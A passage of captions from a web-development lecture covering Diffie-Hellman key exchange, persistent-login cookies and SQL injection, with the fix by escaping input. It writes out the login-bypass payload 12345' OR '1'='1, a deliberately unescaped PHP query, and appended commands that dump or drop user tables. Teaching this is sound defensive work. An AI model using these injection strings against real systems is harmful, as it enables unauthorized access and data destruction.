it's very reasonable,
it's a nice way of sort

1248
00:53:02,516 --> 00:53:03,856
of ensuring there's a mechanism

1249
00:53:03,856 --> 00:53:06,676
in place whereby you're not
visiting potentially bad guys

1250
00:53:06,856 --> 00:53:08,496
or the wrong websites.

1251
00:53:08,906 --> 00:53:12,596
But again, it's nice in theory,

1252
00:53:12,596 --> 00:53:15,936
it's not necessarily
the best experience

1253
00:53:15,936 --> 00:53:19,466
in the end in practice.

1254
00:53:19,566 --> 00:53:20,876
All right, any questions?

1255
00:53:21,066 --> 00:53:27,426
All right, so rather than scare
with some math let's go ahead

1256
00:53:27,426 --> 00:53:28,466
and take our five
minute break here,

1257
00:53:28,466 --> 00:53:30,156
but when we come back
we'll give an example

1258
00:53:30,156 --> 00:53:33,146
of how you can implement
public-key cryptography

1259
00:53:33,146 --> 00:53:34,556
to make it a little
more concrete

1260
00:53:34,556 --> 00:53:36,896
than just there's math
that makes it work.

1261
00:53:37,006 --> 00:53:38,256
And then we'll also
take a look at a bunch

1262
00:53:38,256 --> 00:53:40,166
of other threats
including involving SQL,

1263
00:53:40,206 --> 00:53:41,276
JavaScript, and HTML.

1264
00:53:41,276 --> 00:53:49,236
So why don't we go ahead and
take our five minute break here.

1265
00:53:49,436 --> 00:53:50,026
All right.

1266
00:53:50,496 --> 00:53:53,696
So, math time, though it's
fairly formulaic math.

1267
00:53:54,236 --> 00:53:57,986
All right, so how do
you possibly send --

1268
00:53:58,056 --> 00:54:01,626
come up with a public and
a private key in such a way

1269
00:54:01,626 --> 00:54:05,786
that you can use the public key
to reverse the effects of --

1270
00:54:05,786 --> 00:54:08,156
rather, you can use the private
key to reverse the effects

1271
00:54:08,156 --> 00:54:12,846
of the public key and
ultimately exchange some secret?

1272
00:54:12,846 --> 00:54:16,196
So, there's a couple of very
popular protocols when it comes

1273
00:54:16,236 --> 00:54:17,666
to public key cryptography.

1274
00:54:17,666 --> 00:54:20,136
RSA is one with which
you're probably familiar,

1275
00:54:20,136 --> 00:54:21,016
at least by name.

1276
00:54:21,286 --> 00:54:23,266
Has to do with coming
up with a public

1277
00:54:23,266 --> 00:54:26,336
and a private key using
very interesting properties

1278
00:54:26,336 --> 00:54:29,266
of large numbers that when
multiplied together are very

1279
00:54:29,266 --> 00:54:30,826
difficult to un-multiply

1280
00:54:30,876 --> 00:54:34,446
or factor back down
to their primes.

1281
00:54:34,526 --> 00:54:37,996
So -- but that one's a little
more involved and so a nice one

1282
00:54:37,996 --> 00:54:39,676
to use for the sake of
discussion when it comes

1283
00:54:39,676 --> 00:54:42,846
to public-key crypto, something
called Diffie-Hellman, or DLP.

1284
00:54:42,846 --> 00:54:44,316
And this is an algorithm

1285
00:54:44,316 --> 00:54:47,276
that similarly involves
public-key cryptography,

1286
00:54:47,506 --> 00:54:50,406
but it's an interesting example
of how you can essentially shout

1287
00:54:50,406 --> 00:54:56,586
across a crowded room some
number and your partner, B,

1288
00:54:56,586 --> 00:55:00,106
can do the same and somehow
together that mere exchange

1289
00:55:00,106 --> 00:55:02,016
of that information
is enough to come

1290
00:55:02,016 --> 00:55:03,716
up with a public/private
key pair.

1291
00:55:04,056 --> 00:55:05,876
So this story works as follows.

1292
00:55:05,876 --> 00:55:11,296
In the case here of Alice and
Bob we have the following story.

1293
00:55:11,396 --> 00:55:14,736
Alice and Bob in advance are
going to agree upon two numbers,

1294
00:55:14,826 --> 00:55:18,806
G and P. P is going to be some
prime number, and G is going

1295
00:55:18,806 --> 00:55:20,406
to be what's generally
called a generator,

1296
00:55:20,406 --> 00:55:21,516
which is often the number two.

1297
00:55:21,706 --> 00:55:22,516
As simple as that.

1298
00:55:22,516 --> 00:55:24,266
But P is a big prime number

1299
00:55:24,426 --> 00:55:26,196
and they can choose
P however they like.

1300
00:55:26,196 --> 00:55:27,696
So they have to agree
upon those in advance,

1301
00:55:27,926 --> 00:55:29,336
they can tell their
friends and announce

1302
00:55:29,376 --> 00:55:31,216
to the world what they are,
these are not secret values,

1303
00:55:31,246 --> 00:55:33,226
but they have to
decide on them upfront.

1304
00:55:33,686 --> 00:55:36,546
So then Alice decides
on some random number A,

1305
00:55:36,546 --> 00:55:38,606
and Bob similarly decides

1306
00:55:38,606 --> 00:55:40,746
on some random number B. They
don't tell each other these

1307
00:55:40,746 --> 00:55:43,556
numbers, but they choose them
in isolation of each other,

1308
00:55:43,756 --> 00:55:45,716
and then they perform
a bit of mathematics,

1309
00:55:45,786 --> 00:55:50,106
specifically Alice goes ahead
and computes this value here.

1310
00:55:50,566 --> 00:55:57,396
G to the A mod P. In other
words, Alice goes ahead

1311
00:55:58,096 --> 00:56:00,886
and takes G, which is
probably the number two,

1312
00:56:01,156 --> 00:56:05,086
raises to the power A,
and then does modulo P,

1313
00:56:05,146 --> 00:56:07,586
What is the modulo
operator generally do?

1314
00:56:08,006 --> 00:56:08,616
Yeah, Isaac?

1315
00:56:09,276 --> 00:56:13,556
>> Well it's kind of
like the remainder.

1316
00:56:13,556 --> 00:56:14,156
>> Okay, yeah.

1317
00:56:14,156 --> 00:56:15,276
It's kind of like the remainder.

1318
00:56:15,276 --> 00:56:21,146
It's what you would get if
you were to divide some value,

1319
00:56:21,146 --> 00:56:22,776
like G to the A, by some value.

1320
00:56:22,776 --> 00:56:25,106
It's what you have left over
if it doesn't divide evenly.

1321
00:56:25,376 --> 00:56:28,066
And as an aside I'm trying a new
program for the first time here

1322
00:56:28,066 --> 00:56:30,236
which is why I have this
trial software on the screen,

1323
00:56:30,266 --> 00:56:31,626
but it's the only way
I could try drawing

1324
00:56:31,626 --> 00:56:32,496
for the first time here today.

1325
00:56:33,236 --> 00:56:36,126
So G to the A mod P ends
up being some number,

1326
00:56:36,396 --> 00:56:40,086
and we're going to call it
generically T sub A. So it's T

1327
00:56:40,086 --> 00:56:43,066
and it's Alice's T. So
what does Alice then do?

1328
00:56:43,066 --> 00:56:47,126
She transmits that number, G
to the A mod P, otherwise known

1329
00:56:47,126 --> 00:56:50,426
as T sub A, across the Internet,
in the clear, doesn't matter.

1330
00:56:50,676 --> 00:56:52,866
So in other words, even though
it's drawn here mathematically

1331
00:56:52,866 --> 00:56:56,356
as G to the A mod P, she doesn't
send that written expression.

1332
00:56:56,416 --> 00:56:58,986
She sends the result of
that arithmetic operation,

1333
00:56:58,986 --> 00:57:03,456
T sub A. So Bob does the same
thing but using his B instead

1334
00:57:03,456 --> 00:57:05,896
of A. So he gets some number,
sends that across the Internet.

1335
00:57:06,166 --> 00:57:09,356
So at this point in the story
Alice has sent that first box,

1336
00:57:09,676 --> 00:57:13,626
Bob has now sent this second
box, and so now Alice has what?

1337
00:57:13,696 --> 00:57:16,206
She has A, because
she came up with it,

1338
00:57:16,346 --> 00:57:21,026
and she also has T sub B.
Similarly, does Bob have B,

1339
00:57:21,566 --> 00:57:23,776
and T sub A. So those
are the values

1340
00:57:23,816 --> 00:57:25,146
that have now been exchanged.

1341
00:57:25,516 --> 00:57:26,916
So what do they then do?

1342
00:57:27,286 --> 00:57:28,906
They then both go ahead

1343
00:57:28,906 --> 00:57:31,696
and compute this
value and this value.

1344
00:57:31,986 --> 00:57:35,586
Alice computes T sub B
raised to the A power.

1345
00:57:35,616 --> 00:57:36,746
Now what does that mean?

1346
00:57:37,136 --> 00:57:40,326
Well, T sub B is
just our variable

1347
00:57:40,326 --> 00:57:42,096
that represents what
Bob sent her.

1348
00:57:42,476 --> 00:57:45,216
So she's raising whatever Bob
sent her to the power of A.

1349
00:57:45,216 --> 00:57:49,016
And Bob does the same
thing, raising to the power

1350
00:57:49,016 --> 00:57:50,486
of B what Alice sent him.

1351
00:57:51,336 --> 00:57:54,796
But if you recall how
exponentiation works,

1352
00:57:54,796 --> 00:57:56,796
when you raise something
to the power and then again

1353
00:57:56,796 --> 00:57:59,336
to another power you end up
multiplying the exponents.

1354
00:57:59,786 --> 00:58:02,186
So mathematically
what both Alice

1355
00:58:02,186 --> 00:58:05,796
and Bob have done here is raise
G, which again is some number

1356
00:58:05,796 --> 00:58:10,646
like two, to the power
of A times B, or rather,

1357
00:58:10,646 --> 00:58:13,086
power of B times A, but
that's the same thing.

1358
00:58:13,086 --> 00:58:15,616
With multiplication you can
do it in either direction,

1359
00:58:16,066 --> 00:58:19,296
mod P. So at this point
in the story Alice has A,

1360
00:58:19,296 --> 00:58:25,976
she has T sub B, but she
also has G to the AB mod P,

1361
00:58:26,776 --> 00:58:29,356
even though she doesn't
know what B is.

1362
00:58:29,506 --> 00:58:32,506
And Bob conversely the
same resulting value,

1363
00:58:32,506 --> 00:58:37,016
G to the AB mod P, and he
has B, but he doesn't have A.

1364
00:58:37,536 --> 00:58:41,026
So we seem to have constructed
a scenario in which both Alice

1365
00:58:41,026 --> 00:58:46,796
and Bob have some shared
secret, rather where Alice

1366
00:58:46,796 --> 00:58:51,556
and Bob both have some
value, G to the A mod P,

1367
00:58:51,916 --> 00:58:56,466
but each of them only has a
piece of the rest of the puzzle.

1368
00:58:56,466 --> 00:58:59,886
Alice has A, Bob has
B. So essentially Alice

1369
00:58:59,886 --> 00:59:03,756
and Bob can now use this
number to encrypt information

1370
00:59:03,806 --> 00:59:05,576
and they can reverse its effects

1371
00:59:06,246 --> 00:59:09,246
by using their own
respective private keys.

1372
00:59:09,976 --> 00:59:12,056
So it's not quite
identical to, for instance,

1373
00:59:12,056 --> 00:59:13,616
what a browser would
use these days,

1374
00:59:13,616 --> 00:59:15,106
it's sort of a simpler version,

1375
00:59:15,106 --> 00:59:17,226
or simpler story
of what's possible.

1376
00:59:17,676 --> 00:59:20,726
But it hints at how the
mathematics can behave

1377
00:59:20,726 --> 00:59:23,616
in such a way that you can
share some information publicly,

1378
00:59:23,616 --> 00:59:26,866
like me just talking to Jack's
web server, or me just talking

1379
00:59:26,866 --> 00:59:28,236
to Bob in this scenario,

1380
00:59:28,686 --> 00:59:31,676
and nonetheless preserving
some notion

1381
00:59:31,676 --> 00:59:35,176
of privacy whereby there's
still a number that only I know

1382
00:59:35,406 --> 00:59:37,846
and can use for the
decryption part.

1383
00:59:37,846 --> 00:59:41,576
All right, so now let's
try a concrete example

1384
00:59:41,576 --> 00:59:42,756
of the SQL injection attack.

1385
00:59:42,756 --> 00:59:44,256
We've been talking
about it for some time

1386
00:59:44,666 --> 00:59:46,226
but haven't necessarily
teased apart.

1387
00:59:46,226 --> 00:59:48,396
So here's a login form up top.

1388
00:59:48,396 --> 00:59:50,136
It's representative
of most login forms.

1389
00:59:50,136 --> 00:59:52,376
You got a username, a password
field, and then a checkbox

1390
00:59:52,376 --> 00:59:53,406
for keeping me logged in.

1391
00:59:53,836 --> 00:59:57,456
Now as an aside, before we
look at the SQL, how does a box

1392
00:59:57,456 --> 00:59:59,496
like that generally
get implemented?

1393
01:00:00,036 --> 01:00:01,326
Facebook has something
like this;

1394
01:00:01,326 --> 01:00:02,836
most websites have
something like this.

1395
01:00:03,426 --> 01:00:05,606
And when you check that it
obviously keeps you logged

1396
01:00:05,606 --> 01:00:09,866
in until either for seven days
or until you explicitly log out.

1397
01:00:09,866 --> 01:00:10,556
Yeah, Axle?

1398
01:00:10,796 --> 01:00:15,696
>> Well it has to store the
login variable in a cookie.

1399
01:00:16,286 --> 01:00:20,966
Right? Because the session would
be destroyed once you closed the

1400
01:00:20,966 --> 01:00:21,716
browser window.

1401
01:00:21,926 --> 01:00:22,136
>> Good.

1402
01:00:22,136 --> 01:00:23,326
>> So if you want
to be still logged

1403
01:00:23,326 --> 01:00:25,636
in when you open it again you
have to store it [inaudible].

1404
01:00:25,636 --> 01:00:26,196
>> Good. Exactly.

1405
01:00:26,196 --> 01:00:29,086
So, by checking this box I'm
essentially asking the web

1406
01:00:29,086 --> 01:00:32,416
server, plant a cookie
on my hard drive

1407
01:00:32,916 --> 01:00:37,206
that somehow will remind you who
I am and that I have logged in.

1408
01:00:37,326 --> 01:00:39,406
Now in the worse possible
implementation of this,

1409
01:00:39,756 --> 01:00:42,736
that box could result in
the server setting a cookie

1410
01:00:42,736 --> 01:00:44,146
with both my username
and password

1411
01:00:44,316 --> 01:00:46,796
so that anytime I visit it
just sends it again and again

1412
01:00:46,796 --> 01:00:49,026
and then when I finally logout
it just deletes those cookies.

1413
01:00:49,276 --> 01:00:51,446
But that's of course not a good
mechanism, we talked earlier

1414
01:00:51,446 --> 01:00:52,756
about HTTPS and if it's sent

1415
01:00:52,756 --> 01:00:54,876
in the clear you're just telling
the whole word your username

1416
01:00:54,876 --> 01:00:55,336
and password.

1417
01:00:55,496 --> 01:00:56,666
Plus it's just not necessary.

1418
01:00:56,966 --> 01:00:59,386
So instead what this button
would probably do is tell the

1419
01:00:59,386 --> 01:01:02,306
web server to set another
cookie that's not the PHPSESSID,

1420
01:01:02,306 --> 01:01:03,676
which is a PHP specific thing,

1421
01:01:03,676 --> 01:01:05,396
it's just for the
superglobals purpose.

1422
01:01:06,146 --> 01:01:07,356
Instead setting a cookie

1423
01:01:07,356 --> 01:01:10,386
with the set cookie function
that's called authenticated,

1424
01:01:10,386 --> 01:01:11,216
or something like that.

1425
01:01:11,216 --> 01:01:14,646
And that key authenticated has
some value that's similarly a

1426
01:01:14,706 --> 01:01:16,226
big random looking number,

1427
01:01:16,426 --> 01:01:18,476
but that big random
looking number is remembered

1428
01:01:18,476 --> 01:01:20,086
on the server, maybe
in some database,

1429
01:01:20,456 --> 01:01:22,426
and the next time
the server sees

1430
01:01:22,476 --> 01:01:24,626
that same big random
number in a cookie.

1431
01:01:25,166 --> 01:01:27,146
It checks its database
and sees, oh,

1432
01:01:27,306 --> 01:01:30,756
I gave this big random number
to Isaac, let me assume

1433
01:01:30,896 --> 01:01:32,306
that this is Isaac again

1434
01:01:32,556 --> 01:01:34,996
and show him Isaac's
Facebook profile,

1435
01:01:35,056 --> 01:01:37,066
or whatever website
he's actually visiting.

1436
01:01:37,336 --> 01:01:39,686
Now of course you're
still vulnerable to what?

1437
01:01:42,916 --> 01:01:43,156
>> Physical [inaudible].

1438
01:01:43,246 --> 01:01:45,026
>> Okay, physical access
is always a problem,

1439
01:01:45,026 --> 01:01:45,696
but what else here?

1440
01:01:46,346 --> 01:01:46,536
Jack?

1441
01:01:46,996 --> 01:01:47,626
>> Packet sniffing.

1442
01:01:47,826 --> 01:01:48,466
>> Packet sniffing.

1443
01:01:48,466 --> 01:01:52,226
Right? If it's not HTTPS this
feature is even worse now

1444
01:01:52,226 --> 01:01:54,696
because sessions are
generally ephemeral, right?

1445
01:01:54,696 --> 01:01:57,136
They only exist for the
life of that browser window.

1446
01:01:57,466 --> 01:02:00,156
But something like a cookie
that has a seven day expiration

1447
01:02:00,156 --> 01:02:02,986
or no expiration, that
means someone can sniff this

1448
01:02:02,986 --> 01:02:06,136
and you use it anytime they want
so all the more reason to ensure

1449
01:02:06,136 --> 01:02:07,586
that this is encrypted.

1450
01:02:08,746 --> 01:02:10,426
All right, so now
the SQL part of this.

1451
01:02:10,836 --> 01:02:13,656
Suppose that this
form is a login form

1452
01:02:14,196 --> 01:02:15,406
that essentially results

1453
01:02:15,406 --> 01:02:17,946
in a SQL query getting
generated like this one here.

1454
01:02:18,336 --> 01:02:21,296
So we have -- this can be
implemented in a few ways,

1455
01:02:21,296 --> 01:02:25,076
and I went with the MySQL query
version of this specifically

1456
01:02:25,386 --> 01:02:28,276
so that the inputs
would not be escaped.

1457
01:02:28,666 --> 01:02:32,216
So let me go ahead
here and zoom in a bit.

1458
01:02:32,396 --> 01:02:33,786
And what do we have here?

1459
01:02:33,786 --> 01:02:36,466
So on the left we just have
a variable called result

1460
01:02:36,466 --> 01:02:37,446
for our result set.

1461
01:02:37,446 --> 01:02:39,066
To the right we have
mysql_query,

1462
01:02:39,366 --> 01:02:42,436
recall which was the function we
used initially a couple lectures

1463
01:02:42,436 --> 01:02:44,326
ago for executing SQL commands.

1464
01:02:44,736 --> 01:02:45,826
Then I'm using sprintf.

1465
01:02:45,826 --> 01:02:47,926
Does anyone recall
what sprintf does?

1466
01:02:48,206 --> 01:02:51,466
It's not strictly necessary
but it's a possible approach?

1467
01:02:51,736 --> 01:02:54,626
>> That you insert placeholders
where the variables go

1468
01:02:54,626 --> 01:02:56,496
and then you do command and
then you define the variable.

1469
01:02:56,496 --> 01:02:57,366
>> Yeah. Exactly.

1470
01:02:57,366 --> 01:02:58,826
You just insert these
placeholders.

1471
01:02:58,826 --> 01:03:01,606
So in this case I
have a placeholder %s,

1472
01:03:01,606 --> 01:03:04,576
another placeholder
%s, and that means

1473
01:03:04,576 --> 01:03:08,226
that the next two arguments
to sprintf, here's the first,

1474
01:03:08,336 --> 01:03:09,976
here's the second, are
going to be plugged

1475
01:03:09,976 --> 01:03:10,966
in for that placeholder.

1476
01:03:10,966 --> 01:03:12,756
And it just makes things
a little more readable,

1477
01:03:12,756 --> 01:03:14,576
I don't have to use the
concatenation operator,

1478
01:03:14,576 --> 01:03:15,576
the dot operator.

1479
01:03:15,836 --> 01:03:17,356
I don't have to use
the curly braces.

1480
01:03:17,356 --> 01:03:20,256
It's just one way of
constructing a SQL query

1481
01:03:20,516 --> 01:03:22,686
without just doing
it all very manually.

1482
01:03:22,966 --> 01:03:25,286
But there's a fundamental
problem here with my query

1483
01:03:25,286 --> 01:03:27,546
because I've obviously
not done what?

1484
01:03:28,106 --> 01:03:28,416
Axle?

1485
01:03:28,926 --> 01:03:32,066
>> You haven't escaped with
user input [inaudible] anything.

1486
01:03:32,066 --> 01:03:32,396
>> Exactly.

1487
01:03:32,396 --> 01:03:34,706
I haven't called MySQL
real escape string,

1488
01:03:34,706 --> 01:03:38,386
which even though it's a poorly
named function it does escape

1489
01:03:38,386 --> 01:03:39,946
potentially dangerous
characters,

1490
01:03:39,946 --> 01:03:43,356
things that might lead to
the server being tricked

1491
01:03:43,356 --> 01:03:47,496
into executing a command like
delete, or drop in the database.

1492
01:03:47,576 --> 01:03:49,116
Now, how can we see this here?

1493
01:03:49,266 --> 01:03:52,646
Well notice that the SQL
query that's being built

1494
01:03:52,646 --> 01:03:55,956
up is SELECT uid, so user
ID, or whatever that is,

1495
01:03:56,316 --> 01:04:03,676
FROM users WHERE username equals
'%s' AND password equals '%s'.

1496
01:04:03,676 --> 01:04:07,246
So what's perhaps a dangerous
character a malicious user could

1497
01:04:07,246 --> 01:04:09,546
provide when filling
out this form?

1498
01:04:09,706 --> 01:04:09,906
Jack?

1499
01:04:10,406 --> 01:04:10,836
>> Semicolon?

1500
01:04:11,346 --> 01:04:13,546
>> Semicolon, potentially
dangerous because it would seem

1501
01:04:13,546 --> 01:04:16,476
to terminate the query, or in
this case what's even worse?

1502
01:04:16,826 --> 01:04:19,906
>> You can do a single
quote to end the username --

1503
01:04:19,906 --> 01:04:22,456
yeah end the username and
then you can insert the SQL

1504
01:04:22,656 --> 01:04:24,126
in between.

1505
01:04:24,256 --> 01:04:24,756
>> Exactly.

1506
01:04:24,756 --> 01:04:27,226
In this case the semicolon is
not going to be too worrisome

1507
01:04:27,226 --> 01:04:28,846
because it's going to
be in between quotes.

1508
01:04:28,846 --> 01:04:30,426
So it's not going to
terminate the query.

1509
01:04:30,866 --> 01:04:37,686
But if I were to be like David
O'Malley, like O-'-M-A-L-L-E-Y,

1510
01:04:37,686 --> 01:04:39,726
or some Irish name
that has an apostrophe,

1511
01:04:39,726 --> 01:04:42,196
or any name that has an
apostrophe, that's going

1512
01:04:42,196 --> 01:04:44,006
to be a problem because
it's going to be

1513
01:04:44,006 --> 01:04:48,756
WHERE username equals
'O seemingly unquote

1514
01:04:49,056 --> 01:04:52,216
and then Malley and then
another quote, a third quote,

1515
01:04:52,216 --> 01:04:54,056
and now things are
just imbalanced.

1516
01:04:54,156 --> 01:04:55,196
Now that's going to break.

1517
01:04:55,426 --> 01:04:57,646
So that's just going to trigger
some kind of server error,

1518
01:04:57,786 --> 01:04:59,806
but what if the bad guy
is smart enough to realize

1519
01:04:59,836 --> 01:05:02,586
that if he's going to pretend
to close one of my quotes,

1520
01:05:03,136 --> 01:05:08,156
if he's going to pretend to
close this first quote here.

1521
01:05:08,476 --> 01:05:11,586
He had better realize
that in order for this not

1522
01:05:11,586 --> 01:05:15,426
to be a syntax error, and in
order to truly trick the server

1523
01:05:15,426 --> 01:05:19,046
into executing something, he
better open a new quote later

1524
01:05:19,156 --> 01:05:21,076
that corresponds with
my second apostrophe.

1525
01:05:21,496 --> 01:05:22,596
So what do I mean by this?

1526
01:05:22,596 --> 01:05:26,126
Well let's take a look at
what a user might type in.

1527
01:05:26,896 --> 01:05:29,026
Suppose the user
-- rather, woops.

1528
01:05:29,346 --> 01:05:32,016
Suppose the user types in this,

1529
01:05:33,366 --> 01:05:35,366
and I've deliberately
removed the bullets

1530
01:05:35,616 --> 01:05:37,556
that would normally appear
in a password field just

1531
01:05:37,556 --> 01:05:39,236
so you can see what
this bad guy has typed.

1532
01:05:39,546 --> 01:05:44,236
But what if he proclaims
his password is 12345'

1533
01:05:44,926 --> 01:05:49,606
OR '1' equals '1.

1534
01:05:50,596 --> 01:05:53,196
Now that in and of itself does
not look syntactically valid,

1535
01:05:54,076 --> 01:05:55,416
but what's the implication

1536
01:05:55,416 --> 01:05:58,126
of the bad guy having
provided this as his password?

1537
01:05:58,126 --> 01:05:58,496
Axle?

1538
01:05:58,676 --> 01:06:06,826
>> Well it's going to be
sent to the server and first

1539
01:06:06,826 --> 01:06:09,396
of all it's going to add
two quotes on either side

1540
01:06:09,396 --> 01:06:12,196
because that's what's
inside your password thing.

1541
01:06:12,196 --> 01:06:12,476
>> Good.

1542
01:06:12,746 --> 01:06:15,446
>> But then it's
going to interpret --

1543
01:06:15,446 --> 01:06:20,766
I think it's going to interpret
the 1=1 as just a valid,

1544
01:06:20,886 --> 01:06:25,716
logical statement, so it's going
to return true to the login.

1545
01:06:25,716 --> 01:06:26,466
>> Exactly.

1546
01:06:26,466 --> 01:06:28,416
So because one obviously
equals one,

1547
01:06:28,416 --> 01:06:30,416
and because the bad guy
has been smart enough

1548
01:06:30,416 --> 01:06:33,416
to construct a string that
looks weird, but if you think

1549
01:06:33,416 --> 01:06:37,186
about where it's going in my PHP
code it's going to be prefixed

1550
01:06:37,186 --> 01:06:40,706
with a single quote and
it's going to be suffixed

1551
01:06:40,706 --> 01:06:43,826
with a single quote, at which
point this actually becomes a

1552
01:06:43,826 --> 01:06:48,286
syntactically valid SQL
expression, or condition.

1553
01:06:48,286 --> 01:06:52,836
So now the fact that
he's specifically saying

1554
01:06:52,836 --> 01:06:58,856
OR '1' equals '1 that's the
real brilliant aspect here

1555
01:06:58,856 --> 01:07:03,516
because he had a hunch that I
was doing some kind of select

1556
01:07:03,516 --> 01:07:05,836
where I'm and-ing or maybe
or-ing things together.

1557
01:07:05,836 --> 01:07:09,096
But if he somehow
tricks me into executing,

1558
01:07:09,096 --> 01:07:14,466
give me uid if 1equals1, well
that code is indeed going

1559
01:07:14,586 --> 01:07:16,986
to return one or more uid's

1560
01:07:16,986 --> 01:07:19,206
if there are any
users in the system.

1561
01:07:19,206 --> 01:07:23,636
And presumably, like we saw

1562
01:07:23,806 --> 01:07:29,216
in our login examples
a couple weeks ago,

1563
01:07:29,216 --> 01:07:32,776
if you are using the
presence of a uid signifying

1564
01:07:33,166 --> 01:07:36,736
that a user exists and should
therefore be logged in,

1565
01:07:36,736 --> 01:07:38,626
well now the bad guy has
somehow tricked the server

1566
01:07:38,626 --> 01:07:41,456
into logging him in as who
knows who but as someone.

1567
01:07:41,456 --> 01:07:44,466
And if his goal was simply
to get into the system

1568
01:07:44,466 --> 01:07:47,386
or get WiFi access, or you
know, take someone's money,

1569
01:07:47,386 --> 01:07:49,576
now he has access to an
account on the system even

1570
01:07:49,576 --> 01:07:52,236
if he doesn't know
which uid was returned.

1571
01:07:53,196 --> 01:07:56,216
So to be clear, in red here,

1572
01:07:56,216 --> 01:07:59,916
the query that's just been
constructed would look

1573
01:07:59,916 --> 01:08:00,516
like this.

1574
01:08:00,656 --> 01:08:04,576
SELECT uid FROM users WHERE
name equals 'jharvard'

1575
01:08:04,576 --> 01:08:07,796
AND password-'12345'
OR '1' equals '1'.

1576
01:08:07,796 --> 01:08:09,506
And unfortunately one
always equals one,

1577
01:08:09,506 --> 01:08:12,466
which means you're going to
get back a result set with one

1578
01:08:12,756 --> 01:08:16,046
or more uid's if
there are, again,

1579
01:08:16,046 --> 01:08:17,786
one or more in the database.

1580
01:08:17,786 --> 01:08:19,196
So, kind of bad.

1581
01:08:19,196 --> 01:08:21,096
How do we actually fix this?

1582
01:08:21,096 --> 01:08:25,636
Irony is that it's so
simple to fix, it's annoying

1583
01:08:25,716 --> 01:08:28,006
to type but simple to fix.

1584
01:08:28,006 --> 01:08:31,466
And we can take the exact
same code in blue from before

1585
01:08:31,466 --> 01:08:35,676
and this time simply call
mysql_real_escape_string

1586
01:08:35,676 --> 01:08:39,526
on both the username field
and on the password field

1587
01:08:39,526 --> 01:08:41,606
so that now I have
the ability to specify

1588
01:08:41,606 --> 01:08:45,156
that these things should be
escaped in advance specifically

1589
01:08:46,776 --> 01:08:49,176
by calling this function
here, and this function here.

1590
01:08:49,326 --> 01:08:57,636
So, why do SQL injection attacks
nonetheless happen even though

1591
01:08:57,636 --> 01:09:02,226
it's so relatively
easy to avoid them

1592
01:09:02,226 --> 01:09:04,986
by simply escaping your input?

1593
01:09:04,986 --> 01:09:09,446
And to be clear, what is
mysql_real_escape_string do?

1594
01:09:09,446 --> 01:09:17,766
It's for things like quotes;
it puts a backslash in front

1595
01:09:17,886 --> 01:09:21,276
of them, which means
you won't be tricked

1596
01:09:21,516 --> 01:09:23,286
into executing the wrong thing.

1597
01:09:23,286 --> 01:09:27,176
So why does the world
still suffer SQL injection

1598
01:09:27,396 --> 01:09:27,856
attacks sometimes?

1599
01:09:27,856 --> 01:09:28,156
Jack?

1600
01:09:28,156 --> 01:09:29,086
>> Just errors on
the programmer.

1601
01:09:29,086 --> 01:09:29,976
Maybe he didn't put it in.

1602
01:09:30,036 --> 01:09:30,576
>> Yeah. Exactly.

1603
01:09:30,576 --> 01:09:32,926
The lack of knowledge, lack of
remembering, an attitude of oh,

1604
01:09:32,996 --> 01:09:35,486
I'll go back an escape
my inputs later,

1605
01:09:35,486 --> 01:09:36,716
which is a horrible
possible scenario,

1606
01:09:36,746 --> 01:09:37,496
to know you're doing
it wrong then

1607
01:09:37,526 --> 01:09:38,606
to claim you'll do it
later, lest you forget.

1608
01:09:38,636 --> 01:09:39,236
>> But also I don't think

1609
01:09:39,266 --> 01:09:40,436
that the login forms
are the most vulnerable

1610
01:09:40,466 --> 01:09:41,906
because I think people don't
do this in the login forms,

1611
01:09:41,936 --> 01:09:43,526
but I know of some Internet
security programs they scan the

1612
01:09:43,556 --> 01:09:44,756
entire website looking for
[inaudible] forms and the ones

1613
01:09:44,786 --> 01:09:46,076
that usually the most
vulnerable ones the ones

1614
01:09:46,106 --> 01:09:47,036
that say send a suggestion,
or send [inaudible].

1615
01:09:47,066 --> 01:09:47,133
>> Yeah.

1616
01:09:47,156 --> 01:09:48,386
>> The ones that were added
later on top of the site,

1617
01:09:48,416 --> 01:09:49,856
after the login was finished,
and they didn't really think

1618
01:09:49,886 --> 01:09:51,086
that that would be a
potential security threat.

1619
01:09:51,116 --> 01:09:51,356
>> That's good.

1620
01:09:51,386 --> 01:09:52,166
Yeah. It's potentially
the stupid

1621
01:09:52,196 --> 01:09:53,636
or the seemingly innocuous
forms that have nothing to do

1622
01:09:53,666 --> 01:09:55,136
with security, nothing to do
with users, but if they have

1623
01:09:55,166 --> 01:09:56,456
to do with SQL, like if
you're using SQL to insert

1624
01:09:56,486 --> 01:09:57,446
into the database
some user's feedback,

1625
01:09:57,476 --> 01:09:58,976
well the problem here is that
they can execute not just

1626
01:09:59,006 --> 01:10:00,116
or 1equals1, they
could do something

1627
01:10:00,146 --> 01:10:01,226
like semicolon select
star from users

1628
01:10:01,256 --> 01:10:01,976
and dump your whole database.

1629
01:10:02,046 --> 01:10:06,726
Or worse, they can do drop
table users, or delete star

1630
01:10:06,726 --> 01:10:09,566
from user, or delete from users.

1631
01:10:09,566 --> 01:10:11,156
You can do any number of things.

1632
01:10:11,186 --> 01:10:13,576
So in fact some of the
popular press attacks

1633
01:10:13,576 --> 01:10:16,136
that you've read about,
there was one, was it Yahoo?

1634
01:10:16,356 --> 01:10:18,796
Someone's recently, I
forget, that involved a dump

1635
01:10:18,796 --> 01:10:22,606
of a SQL database, was
very likely the result

1636
01:10:22,816 --> 01:10:25,926
or was likely the result
of something like this

1637
01:10:25,926 --> 01:10:28,646
where someone injected
SQL into a script

1638
01:10:28,906 --> 01:10:30,756
that hadn't scrubbed
it properly.

1639
01:10:30,756 --> 01:10:33,546
That or someone got access
electronically to the database

1640
01:10:33,806 --> 01:10:35,816
and just kind of manually
executed these queries.

1641
01:10:35,896 --> 01:10:38,646
Both scenarios could yield
the data in question.

1642
01:10:38,646 --> 01:10:40,696
I don't think Yahoo, or
whoever it was, was very --

1643
01:10:40,696 --> 01:10:41,376
>> I think it LinkedIn.

1644
01:10:41,486 --> 01:10:43,676
>> Oh, it was LinkedIn,
maybe that was the one.

1645
01:10:43,676 --> 01:10:46,086
I don't think they were very
forthcoming with their details.

1646
01:10:46,406 --> 01:10:47,466
But the fact too that one

1647
01:10:47,466 --> 01:10:49,836
of them actually had clear
text passwords I think.

1648
01:10:50,366 --> 01:10:51,906
That was idiotic,
whoever that was.

1649
01:10:52,046 --> 01:10:53,146
That was just not necessary.

1650
01:10:53,436 --> 01:10:54,156
Right? That was like, what?

1651
01:10:54,156 --> 01:10:55,126
Lecture three or something?

1652
01:10:55,126 --> 01:10:56,566
So, all right.

1653
01:10:56,976 --> 01:11:01,956
Anyhow. So what more is
there to fear out there?

